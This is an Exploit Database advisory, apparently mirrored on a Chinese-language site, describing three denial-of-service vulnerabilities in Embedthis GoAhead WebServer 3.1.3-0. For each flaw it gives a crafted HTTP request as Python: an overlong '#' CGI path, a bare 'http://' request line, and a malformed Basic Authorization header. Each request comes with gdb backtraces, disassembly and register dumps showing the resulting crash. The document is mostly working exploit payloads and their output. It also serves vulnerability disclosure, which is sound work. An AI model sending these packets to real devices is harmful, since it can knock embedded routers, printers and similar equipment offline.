Embedthis Goahead WebServer 3.1.3-0 – Multiple Vulnerabilities

• Exploit Database
• 17 阅读

• 作者： Maksymilian Motyl
  日期： 2014-02-19
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/31761/

• # Title: Embedthis Goahead Webserver multiple DoS vulnerabilities.
  # Author: 0in (Maksymilian Motyl)
  # Date: 18.02.2014
  # Version: 3.1.3-0
  # Software Link: http://embedthis.com/products/goahead/
  # Download: https://github.com/embedthis/goahead
  # Tested on: Linux x32
  # Description: 
  # "GoAhead is embedded in hundreds of millions of devices and applications like: printers, routers, switches, IP phones, mobile applications, data acquisition, 
  # military applications and WIFI gateways."
  # .... Ok.
  # But I cannot confirm any vulnerability in products listed at http://embedthis.com/products/goahead/users.html
  
  -----------------------------------------------
  	1st vulnerability
  
  ***************************************
  
  #!/usr/bin/python
  
  packet="GET /cgi-bin/test/a/c/?"+"#"*1024+".cgi/c.txt HTTP/1.1\r\n"\
  "Host: 127.0.0.1\r\n"\
  "User-Agent: BillyExploiter\r\n"\
  "Accept: text/html\r\n"\
  "Accept-Language: pl\r\n"\
  "Accept-Encoding: gzip, deflate\r\n"\
  "Connection: keep-alive"
  
  ***************************************
  
  Program received signal SIGABRT, Aborted.
  0xb7772424 in __kernel_vsyscall ()
  (gdb) bt
  #00xb7772424 in __kernel_vsyscall ()
  #10xb757d941 in *__GI_raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
  #20xb7580d72 in *__GI_abort () at abort.c:92
  #30xb75b9e15 in __libc_message (do_abort=2, 
  fmt=0xb7691e70 "*** glibc detected *** %s: %s: 0x%s ***\n")
  at ../sysdeps/unix/sysv/linux/libc_fatal.c:189
  #40xb75c3f01 in malloc_printerr (action=<optimized out>, 
  str=0x6 <Address 0x6 out of bounds>, ptr=0xb7765dad) at malloc.c:6283
  #50xb75c517e in munmap_chunk (p=<optimized out>) at malloc.c:3540
  #60xb7752d74 in termWebs (wp=wp@entry=0x8573240, reuse=reuse@entry=1)
  at src/http.c:457
  #70xb775309c in reuseConn (wp=0x8573240) at src/http.c:520
  #8complete (wp=wp@entry=0x8573240, reuse=reuse@entry=1) at src/http.c:575
  #90xb7754571 in websPump (wp=wp@entry=0x8573240) at src/http.c:837
  #10 0xb7755606 in readEvent (wp=0x8573240) at src/http.c:797
  #11 socketEvent (wptr=0x8573240, mask=2, sid=<optimized out>) at src/http.c:735
  
  
  *** glibc detected *** goahead: munmap_chunk(): invalid pointer: 0xb7765dad ***
  
  (gdb) x/xw 0xb7765dad
  0xb7765dad:	0x74746800 # "tth" 
  
  -----------------------------------------------
  
  	2nd vulnerability
  
  ***************************************
  
  #!/usr/bin/python
  packet="GET http:// HTTP/1.1\r\n"
  
  # Same crash happens when:
  packet="GET http://dupa: HTTP/1.1\r\n"
  
  ***************************************
  
  
  Program received signal SIGSEGV, Segmentation fault.
  websDecodeUrl (decoded=decoded@entry=0xb7756253 "/", 
  input=input@entry=0xb7756253 "/", len=<optimized out>, len@entry=-1)
  at src/http.c:2225
  warning: Source file is more recent than executable.
  2225	*op = *ip;
  (gdb) bt
  #0websDecodeUrl (decoded=decoded@entry=0xb7756253 "/", 
  input=input@entry=0xb7756253 "/", len=<optimized out>, len@entry=-1)
  at src/http.c:2225
  #10xb774248f in websUrlParse (url=0x83bf140 "http", url@entry=0x83cd58c "http://", 
  pbuf=pbuf@entry=0xbfe6ce14, pprotocol=pprotocol@entry=0x0, 
  phost=phost@entry=0xbfe6ce00, pport=pport@entry=0xbfe6ce0c, 
  ppath=ppath@entry=0xbfe6ce08, pext=pext@entry=0xbfe6ce10, 
  preference=preference@entry=0x0, pquery=pquery@entry=0xbfe6ce04)
  at src/http.c:3122
  #20xb7745079 in parseFirstLine (wp=0x83bf240) at src/http.c:949
  #3parseIncoming (wp=0x83bf240) at src/http.c:870
  
  (gdb) disas $eip
  
   0xb773fb28 <+72>:	cmp$0x25,%dl
   0xb773fb2b <+75>:	je 0xb773fb70 <websDecodeUrl+144>
  => 0xb773fb2d <+77>:	mov%dl,(%esi)
  
  (gdb) info reg
  eax0x1	1
  ecx0x13	19
  edx0x2f	47
  ebx0xb775e91c	-1217009380
  esp0xbfe6cd20	0xbfe6cd20
  ebp0xb7756254	0xb7756254
  esi0xb7756253	-1217043885
  edi0xb7756253	-1217043885
  eip0xb773fb2d	0xb773fb2d <websDecodeUrl+77>
  
  (gdb) x/xw 0xb7756253
  0xb7756253:	0x7473002f
  
  
  -----------------------------------------------
  
  	3rd vulnerability
  
  ***************************************
  
  #!/usr/bin/python
  packet="GET http://127.0.0.1/auth/basic/ HTTP/1.1\r\n"\
  "Host: 127.0.0.1\r\n"\
  "Accept: text/html\r\n"\
  "Accept-Language: pl\r\n"\
  "Accept-Encoding: gzip, deflate\r\n"\
  "Connection: keep-alive\r\n"
  "Authorization: Basic #\r\n"
  ***************************************
  
  (gdb) bt
  #0strchr () at ../sysdeps/i386/strchr.S:127
  #10xb770652a in parseBasicDetails (wp=0x8055240) at src/auth.c:717
  #20xb7706c31 in websAuthenticate (wp=wp@entry=0x8055240) at src/auth.c:110
  #30xb7717532 in websRouteRequest (wp=wp@entry=0x8055240) at src/route.c:85
  
  (gdb) disas $eip
   0xb758799a <+90>:	lea0x0(%esi),%esi
   0xb75879a0 <+96>:	add$0x10,%eax
  => 0xb75879a3 <+99>:	mov(%eax),%ecx
  
  (gdb) info reg
  eax0x0	0
  ecx0x3a3a	14906
  edx0x3a3a3a3a	976894522
  ebx0xb772a91c	-1217222372
  esp0xbfc71428	0xbfc71428
  ebp0x8055240	0x8055240
  esi0x8055240	134566464
  edi0x0	0
  eip0xb75879a3	0xb75879a3 <strchr+99>